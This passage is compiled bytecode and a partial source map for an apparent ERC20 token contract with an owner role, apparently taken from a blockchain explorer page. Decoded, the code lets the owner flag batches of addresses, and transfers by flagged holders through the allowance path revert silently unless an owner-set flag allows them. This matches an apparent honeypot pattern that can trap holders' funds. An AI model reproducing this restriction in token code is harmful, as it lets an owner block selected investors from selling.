ffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f38919061115e565b60405180910390a3610f4b848484611098565b50505050565b610f5961097e565b73ffffffffffffffffffffffffffffffffffffffff16610f7761071f565b73ffffffffffffffffffffffffffffffffffffffff1614610fcd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc490611a96565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110d2826110a7565b9050919050565b6110e2816110c7565b81146110ed57600080fd5b50565b6000813590506110ff816110d9565b92915050565b6000806040838503121561111c5761111b61109d565b5b600061112a858286016110f0565b925050602061113b858286016110f0565b9150509250929050565b6000819050919050565b61115881611145565b82525050565b6000602082019050611173600083018461114f565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111b3578082015181840152602081019050611198565b60008484015250505050565b6000601f19601f8301169050919050565b60006111db82611179565b6111e58185611184565b93506111f5818560208601611195565b6111fe816111bf565b840191505092915050565b6000602082019050818103600083015261122381846111d0565b905092915050565b61123481611145565b811461123f57600080fd5b50565b6000813590506112518161122b565b92915050565b6000806040838503121561126e5761126d61109d565b5b600061127c858286016110f0565b925050602061128d85828601611242565b9150509250929050565b60008115159050919050565b6112ac81611297565b82525050565b60006020820190506112c760008301846112a3565b92915050565b6000602082840312156112e3576112e261109d565b5b60006112f1848285016110f0565b91505092915050565b6000806000606084860312156113135761131261109d565b5b6000611321868287016110f0565b9350506020611332868287016110f0565b925050604061134386828701611242565b9150509250925092565b600080fd5b600080fd5b600080fd5b60008083601f8401126113725761137161134d565b5b8235905067ffffffffffffffff81111561138f5761138e611352565b5b6020830191508360208202830111156113ab576113aa611357565b5b9250929050565b600080602083850312156113c9576113c861109d565b5b600083013567ffffffffffffffff8111156113e7576113e66110a2565b5b6113f38582860161135c565b92509250509250929050565b600060ff82169050919050565b611415816113ff565b82525050565b6000602082019050611430600083018461140c565b92915050565b61143f816110c7565b82525050565b600060208201905061145a6000830184611436565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114a757607f821691505b6020821081036114ba576114b9611460565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061152982611145565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361155b5761155a6114ef565b5b600182019050919050565b600061157182611145565b915061157c83611145565b9250828201905080821115611594576115936114ef565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006115f6602583611184565b91506116018261159a565b604082019050919050565b60006020820190508181036000830152611625816115e9565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611688602683611184565b91506116938261162c565b604082019050919050565b600060208201905081810360008301526116b78161167b565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061171a602483611184565b9150611725826116be565b604082019050919050565b600060208201905081810360008301526117498161170d565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006117ac602283611184565b91506117b782611750565b604082019050919050565b600060208201905081810360008301526117db8161179f565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611818601d83611184565b9150611823826117e2565b602082019050919050565b600060208201905081810360008301526118478161180b565b9050919050565b50565b600061185e600083611184565b91506118698261184e565b600082019050919050565b6000602082019050818103600083015261188d81611851565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006118f0602583611184565b91506118fb82611894565b604082019050919050565b6000602082019050818103600083015261191f816118e3565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611982602383611184565b915061198d82611926565b604082019050919050565b600060208201905081810360008301526119b181611975565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a14602683611184565b9150611a1f826119b8565b604082019050919050565b60006020820190508181036000830152611a4381611a07565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a80602083611184565b9150611a8b82611a4a565b602082019050919050565b60006020820190508181036000830152611aaf81611a73565b905091905056fea26469706673582212202f783b6baa6e007028d144c80239fc0aebf2580c8f1b7b7a6ed52f9bde13534864736f6c63430008120033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a257806395d89b411161007157806395d89b41146102f5578063a457c2d714610313578063a9059cbb14610343578063dd62ed3e14610373578063f2fde38b146103a357610116565b806370a0823114610281578063715018a6146102b1578063716496ae146102bb5780638da5cb5b146102d757610116565b806318160ddd116100e957806318160ddd146101c957806323b872dd146101e75780632ee17e0b14610217578063313ce56714610233578063395093511461025157610116565b8063024c2ddd1461011b57806306fdde031461014b578063095ea7b31461016957806309690a4914610199575b600080fd5b61013560048036038101906101309190611105565b6103bf565b604051610142919061115e565b60405180910390f35b6101536103e4565b6040516101609190611209565b60405180910390f35b610183600480360381019061017e9190611257565b610476565b60405161019091906112b2565b60405180910390f35b6101b360048036038101906101ae91906112cd565b610499565b6040516101c091906112b2565b60405180910390f35b6101d16104ef565b6040516101de919061115e565b60405180910390f35b61020160048036038101906101fc91906112fa565b6104f9565b60405161020e91906112b2565b60405180910390f35b610231600480360381019061022c91906113b2565b610528565b005b61023b6105d5565b604051610248919061141b565b60405180910390f35b61026b60048036038101906102669190611257565b6105de565b60405161027891906112b2565b60405180910390f35b61029b600480360381019061029691906112cd565b610615565b6040516102a8919061115e565b60405180910390f35b6102b961065e565b005b6102d560048036038101906102d091906113b2565b610672565b005b6102df61071f565b6040516102ec9190611445565b60405180910390f35b6102fd610748565b60405161030a9190611209565b60405180910390f35b61032d60048036038101906103289190611257565b6107da565b60405161033a91906112b2565b60405180910390f35b61035d60048036038101906103589190611257565b610851565b60405161036a91906112b2565b60405180910390f35b61038d60048036038101906103889190611105565b610874565b60405161039a919061115e565b60405180910390f35b6103bd60048036038101906103b891906112cd565b6108fb565b005b6003602052816000526040600020602052806000526040600020600091509150505481565b6060600680546103f39061148f565b80601f016020809104026020016040519081016040528092919081815260200182805461041f9061148f565b801561046c5780601f106104415761010080835404028352916020019161046c565b820191906000526020600020905b81548152906001019060200180831161044f57829003601f168201915b5050505050905090565b60008061048161097e565b905061048e818585610986565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600454905090565b60008061050461097e565b9050610511858285610b4f565b61051c858585610cd8565b60019150509392505050565b610530610f51565b60005b828290508110156105d057600160026000858585818110610557576105566114c0565b5b905060200201602081019061056c91906112cd565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806105c89061151e565b915050610533565b505050565b60006012905090565b6000806105e961097e565b905061060a8185856105fb8589610874565b6106059190611566565b610986565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610666610f51565b6106706000610fcf565b565b61067a610f51565b60005b8282905081101561071a576000600260008585858181106106a1576106a06114c0565b5b90506020020160208101906106b691906112cd565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806107129061151e565b91505061067d565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546107579061148f565b80601f01602080910402602001604051908101604052809291908181526020018280546107839061148f565b80156107d05780601f106107a5576101008083540402835291602001916107d0565b820191906000526020600020905b8154815290600101906020018083116107b357829003601f168201915b5050505050905090565b6000806107e561097e565b905060006107f38286610874565b905083811015610838576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082f9061160c565b60405180910390fd5b6108458286868403610986565b60019250505092915050565b60008061085c61097e565b9050610869818585610cd8565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610903610f51565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610972576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109699061169e565b60405180910390fd5b61097b81610fcf565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ec90611730565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a5b906117c2565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b42919061115e565b60405180910390a3505050565b6000610b5b8484610874565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bd55781811015610bc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bbe9061182e565b60405180910390fd5b610bd48484848403610986565b5b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610c765750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610cd25760011515600560009054906101000a900460ff16151514610cd1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc890611874565b60405180910390fd5b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d47576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3e90611906565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610db6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dad90611998565b60405180910390fd5b610dc1838383611093565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3f90611a2a565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f38919061115e565b60405180910390a3610f4b848484611098565b50505050565b610f5961097e565b73ffffffffffffffffffffffffffffffffffffffff16610f7761071f565b73ffffffffffffffffffffffffffffffffffffffff1614610fcd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc490611a96565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110d2826110a7565b9050919050565b6110e2816110c7565b81146110ed57600080fd5b50565b6000813590506110ff816110d9565b92915050565b6000806040838503121561111c5761111b61109d565b5b600061112a858286016110f0565b925050602061113b858286016110f0565b9150509250929050565b6000819050919050565b61115881611145565b82525050565b6000602082019050611173600083018461114f565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111b3578082015181840152602081019050611198565b60008484015250505050565b6000601f19601f8301169050919050565b60006111db82611179565b6111e58185611184565b93506111f5818560208601611195565b6111fe816111bf565b840191505092915050565b6000602082019050818103600083015261122381846111d0565b905092915050565b61123481611145565b811461123f57600080fd5b50565b6000813590506112518161122b565b92915050565b6000806040838503121561126e5761126d61109d565b5b600061127c858286016110f0565b925050602061128d85828601611242565b9150509250929050565b60008115159050919050565b6112ac81611297565b82525050565b60006020820190506112c760008301846112a3565b92915050565b6000602082840312156112e3576112e261109d565b5b60006112f1848285016110f0565b91505092915050565b6000806000606084860312156113135761131261109d565b5b6000611321868287016110f0565b9350506020611332868287016110f0565b925050604061134386828701611242565b9150509250925092565b600080fd5b600080fd5b600080fd5b60008083601f8401126113725761137161134d565b5b8235905067ffffffffffffffff81111561138f5761138e611352565b5b6020830191508360208202830111156113ab576113aa611357565b5b9250929050565b600080602083850312156113c9576113c861109d565b5b600083013567ffffffffffffffff8111156113e7576113e66110a2565b5b6113f38582860161135c565b92509250509250929050565b600060ff82169050919050565b611415816113ff565b82525050565b6000602082019050611430600083018461140c565b92915050565b61143f816110c7565b82525050565b600060208201905061145a6000830184611436565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114a757607f821691505b6020821081036114ba576114b9611460565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061152982611145565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361155b5761155a6114ef565b5b600182019050919050565b600061157182611145565b915061157c83611145565b9250828201905080821115611594576115936114ef565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006115f6602583611184565b91506116018261159a565b604082019050919050565b60006020820190508181036000830152611625816115e9565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611688602683611184565b91506116938261162c565b604082019050919050565b600060208201905081810360008301526116b78161167b565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061171a602483611184565b9150611725826116be565b604082019050919050565b600060208201905081810360008301526117498161170d565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006117ac602283611184565b91506117b782611750565b604082019050919050565b600060208201905081810360008301526117db8161179f565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611818601d83611184565b9150611823826117e2565b602082019050919050565b600060208201905081810360008301526118478161180b565b9050919050565b50565b600061185e600083611184565b91506118698261184e565b600082019050919050565b6000602082019050818103600083015261188d81611851565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006118f0602583611184565b91506118fb82611894565b604082019050919050565b6000602082019050818103600083015261191f816118e3565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611982602383611184565b915061198d82611926565b604082019050919050565b600060208201905081810360008301526119b181611975565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a14602683611184565b9150611a1f826119b8565b604082019050919050565b60006020820190508181036000830152611a4381611a07565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a80602083611184565b9150611a8b82611a4a565b602082019050919050565b60006020820190508181036000830152611aaf81611a73565b905091905056fea26469706673582212202f783b6baa6e007028d144c80239fc0aebf2580c8f1b7b7a6ed52f9bde13534864736f6c63430008120033

Deployed Bytecode Sourcemap

20528:139:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8018:66;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8737:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11592:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10187:109;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10361:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12373:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9800:188;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9699:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13077:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10532:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5843:103;;;:::i;:::-;;9996:183;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5202:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8956:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13818:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10865:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11121:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6101:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8018:66;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;8737:100::-;8791:13;8824:5;8817:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8737:100;:::o;11592:201::-;11675:4;11692:13;11708:12;:10;:12::i;:::-;11692:28;;11731:32;11740:5;11747:7;11756:6;11731:8;:32::i;:::-;11781:4;11774:11;;;11592:201;;;;:::o;10187:109::-;10248:4;10272:10;:16;10283:4;10272:16;;;;;;;;;;;;;;;;;;;;;;;;;10265:23;;10187:109;;;:::o;10361:108::-;10422:7;10449:12;;10442:19;;10361:108;:::o;12373:295::-;12504:4;12521:15;12539:12;:10;:12::i;:::-;12521:30;;12562:38;12578:4;12584:7;12593:6;12562:15;:38::i;:::-;12611:27;12621:4;12627:2;12631:6;12611:9;:27::i;:::-;12656:4;12649:11;;;12373:295;;;;;:::o;9800:188::-;5088:13;:11;:13::i;:::-;9889:9:::1;9884:97;9908:5;;:12;;9904:1;:16;9884:97;;;9965:4;9942:10;:20;9953:5;;9959:1;9953:8;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9942:20;;;;;;;;;;;;;;;;:27;;;;;;;;;;;;;;;;;;9922:3;;;;;:::i;:::-;;;;9884:97;;;;9800:188:::0;;:::o;9699:93::-;9757:5;9782:2;9775:9;;9699:93;:::o;13077:238::-;13165:4;13182:13;13198:12;:10;:12::i;:::-;13182:28;;13221:64;13230:5;13237:7;13274:10;13246:25;13256:5;13263:7;13246:9;:25::i;:::-;:38;;;;:::i;:::-;13221:8;:64::i;:::-;13303:4;13296:11;;;13077:238;;;;:::o;10532:127::-;10606:7;10633:9;:18;10643:7;10633:18;;;;;;;;;;;;;;;;10626:25;;10532:127;;;:::o;5843:103::-;5088:13;:11;:13::i;:::-;5908:30:::1;5935:1;5908:18;:30::i;:::-;5843:103::o:0;9996:183::-;5088:13;:11;:13::i;:::-;10079:9:::1;10074:98;10098:5;;:12;;10094:1;:16;10074:98;;;10155:5;10132:10;:20;10143:5;;10149:1;10143:8;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10132:20;;;;;;;;;;;;;;;;:28;;;;;;;;;;;;;;;;;;10112:3;;;;;:::i;:::-;;;;10074:98;;;;9996:183:::0;;:::o;5202:87::-;5248:7;5275:6;;;;;;;;;;;5268:13;;5202:87;:::o;8956:104::-;9012:13;9045:7;9038:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8956:104;:::o;13818:436::-;13911:4;13928:13;13944:12;:10;:12::i;:::-;13928:28;;13967:24;13994:25;14004:5;14011:7;13994:9;:25::i;:::-;13967:52;;14058:15;14038:16;:35;;14030:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;14151:60;14160:5;14167:7;14195:15;14176:16;:34;14151:8;:60::i;:::-;14242:4;14235:11;;;;13818:436;;;;:::o;10865:193::-;10944:4;10961:13;10977:12;:10;:12::i;:::-;10961:28;;11000;11010:5;11017:2;11021:6;11000:9;:28::i;:::-;11046:4;11039:11;;;10865:193;;;;:::o;11121:151::-;11210:7;11237:11;:18;11249:5;11237:18;;;;;;;;;;;;;;;:27;11256:7;11237:27;;;;;;;;;;;;;;;;11230:34;;11121:151;;;;:::o;6101:201::-;5088:13;:11;:13::i;:::-;6210:1:::1;6190:22;;:8;:22;;::::0;6182:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6266:28;6285:8;6266:18;:28::i;:::-;6101:201:::0;:::o;3911:98::-;3964:7;3991:10;3984:17;;3911:98;:::o;17845:380::-;17998:1;17981:19;;:5;:19;;;17973:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18079:1;18060:21;;:7;:21;;;18052:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18163:6;18133:11;:18;18145:5;18133:18;;;;;;;;;;;;;;;:27;18152:7;18133:27;;;;;;;;;;;;;;;:36;;;;18201:7;18185:32;;18194:5;18185:32;;;18210:6;18185:32;;;;;;:::i;:::-;;;;;;;;17845:380;;;:::o;18516:548::-;18651:24;18678:25;18688:5;18695:7;18678:9;:25::i;:::-;18651:52;;18738:17;18718:16;:37;18714:248;;18800:6;18780:16;:26;;18772:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18884:51;18893:5;18900:7;18928:6;18909:16;:25;18884:8;:51::i;:::-;18714:248;18976:10;:17;18987:5;18976:17;;;;;;;;;;;;;;;;;;;;;;;;;:40;;;;18997:10;:19;19008:7;18997:19;;;;;;;;;;;;;;;;;;;;;;;;;18976:40;18972:84;;;19047:4;19026:25;;:17;;;;;;;;;;;:25;;;19018:38;;;;;;;;;;;;:::i;:::-;;;;;;;;;18972:84;18640:424;18516:548;;;:::o;14724:840::-;14871:1;14855:18;;:4;:18;;;14847:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;14948:1;14934:16;;:2;:16;;;14926:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;15003:38;15024:4;15030:2;15034:6;15003:20;:38::i;:::-;15054:19;15076:9;:15;15086:4;15076:15;;;;;;;;;;;;;;;;15054:37;;15125:6;15110:11;:21;;15102:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;15242:6;15228:11;:20;15210:9;:15;15220:4;15210:15;;;;;;;;;;;;;;;:38;;;;15445:6;15428:9;:13;15438:2;15428:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;15495:2;15480:26;;15489:4;15480:26;;;15499:6;15480:26;;;;;;:::i;:::-;;;;;;;;15519:37;15539:4;15545:2;15549:6;15519:19;:37::i;:::-;14836:728;14724:840;;;:::o;5367:132::-;5442:12;:10;:12::i;:::-;5431:23;;:7;:5;:7::i;:::-;:23;;;5423:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5367:132::o;6462:191::-;6536:16;6555:6;;;;;;;;;;;6536:25;;6581:8;6572:6;;:17;;;;;;;;;;;;;;;;;;6636:8;6605:40;;6626:8;6605:40;;;;;;;;;;;;6525:128;6462:191;:::o;20396:125::-;;;;:::o;19668:124::-;;;;:::o;88:117:1:-;197:1;194;187:12;211:117;320:1;317;310:12;334:126;371:7;411:42;404:5;400:54;389:65;;334:126;;;:::o;466:96::-;503:7;532:24;550:5;532:24;:::i;:::-;521:35;;466:96;;;:::o;568:122::-;641:24;659:5;641:24;:::i;:::-;634:5;631:35;621:63;;680:1;677;670:12;621:63;568:122;:::o;696:139::-;742:5;780:6;767:20;758:29;;796:33;823:5;796:33;:::i;:::-;696:139;;;;:::o;841:474::-;909:6;917;966:2;954:9;945:7;941:23;937:32;934:119;;;972:79;;:::i;:::-;934:119;1092:1;1117:53;1162:7;1153:6;1142:9;1138:22;1117:53;:::i;:::-;1107:63;;1063:117;1219:2;1245:53;1290:7;1281:6;1270:9;1266:22;1245:53;:::i;:::-;1235:63;;1190:118;841:474;;;;;:::o;1321:77::-;1358:7;1387:5;1376:16;;1321:77;;;:::o;1404:118::-;1491:24;1509:5;1491:24;:::i;:::-;1486:3;1479:37;1404:118;;:::o;1528:222::-;1621:4;1659:2;1648:9;1644:18;1636:26;;1672:71;1740:1;1729:9;1725:17;1716:6;1672:71;:::i;:::-;1528:222;;;;:::o;1756:99::-;1808:6;1842:5;1836:12;1826:22;;1756:99;;;:::o;1861:169::-;1945:11;1979:6;1974:3;1967:19;2019:4;2014:3;2010:14;1995:29;;1861:169;;;;:::o;2036:246::-;2117:1;2127:113;2141:6;2138:1;2135:13;2127:113;;;2226:1;2221:3;2217:11;2211:18;2207:1;2202:3;2198:11;2191:39;2163:2;2160:1;2156:10;2151:15;;2127:113;;;2274:1;2265:6;2260:3;2256:16;2249:27;2098:184;2036:246;;;:::o;2288:102::-;2329:6;2380:2;2376:7;2371:2;2364:5;2360:14;2356:28;2346:38;;2288:102;;;:::o;2396:377::-;2484:3;2512:39;2545:5;2512:39;:::i;:::-;2567:71;2631:6;2626:3;2567:71;:::i;:::-;2560:78;;2647:65;2705:6;2700:3;2693:4;2686:5;2682:16;2647:65;:::i;:::-;2737:29;2759:6;2737:29;:::i;:::-;2732:3;2728:39;2721:46;;2488:285;2396:377;;;;:::o;2779:313::-;2892:4;2930:2;2919:9;2915:18;2907:26;;2979:9;2973:4;2969:20;2965:1;2954:9;2950:17;2943:47;3007:78;3080:4;3071:6;3007:78;:::i;:::-;2999:86;;2779:313;;;;:::o;3098:122::-;3171:24;3189:5;3171:24;:::i;:::-;3164:5;3161:35;3151:63;;3210:1;3207;3200:12;3151:63;3098:122;:::o;3226:139::-;3272:5;3310:6;3297:20;3288:29;;3326:33;3353:5;3326:33;:::i;:::-;3226:139;;;;:::o;3371:474::-;3439:6;3447;3496:2;3484:9;3475:7;3471:23;3467:32;3464:119;;;3502:79;;:::i;:::-;3464:119;3622:1;3647:53;3692:7;3683:6;3672:9;3668:22;3647:53;:::i;:::-;3637:63;;3593:117;3749:2;3775:53;3820:7;3811:6;3800:9;3796:22;3775:53;:::i;:::-;3765:63;;3720:118;3371:474;;;;;:::o;3851:90::-;3885:7;3928:5;3921:13;3914:21;3903:32;;3851:90;;;:::o;3947:109::-;4028:21;4043:5;4028:21;:::i;:::-;4023:3;4016:34;3947:109;;:::o;4062:210::-;4149:4;4187:2;4176:9;4172:18;4164:26;;4200:65;4262:1;4251:9;4247:17;4238:6;4200:65;:::i;:::-;4062:210;;;;:::o;4278:329::-;4337:6;4386:2;4374:9;4365:7;4361:23;4357:32;4354:119;;;4392:79;;:::i;:::-;4354:119;4512:1;4537:53;4582:7;4573:6;4562:9;4558:22;4537:53;:::i;:::-;4527:63;;4483:117;4278:329;;;;:::o;4613:619::-;4690:6;4698;4706;4755:2;4743:9;4734:7;4730:23;4726:32;4723:119;;;4761:79;;:::i;:::-;4723:119;4881:1;4906:53;4951:7;4942:6;4931:9;4927:22;4906:53;:::i;:::-;4896:63;;4852:117;5008:2;5034:53;5079:7;5070:6;5059:9;5055:22;5034:53;:::i;:::-;5024:63;;4979:118;5136:2;5162:53;5207:7;5198:6;5187:9;5183:22;5162:53;:::i;:::-;5152:63;;5107:118;4613:619;;;;;:::o;5238:117::-;5347:1;5344;5337:12;5361:117;5470:1;5467;5460:12;5484:117;5593:1;5590;5583:12;5624:568;5697:8;5707:6;5757:3;5750:4;5742:6;5738:17;5734:27;5724:122;;5765:79;;:::i;:::-;5724:122;5878:6;5865:20;5855:30;;5908:18;5900:6;5897:30;58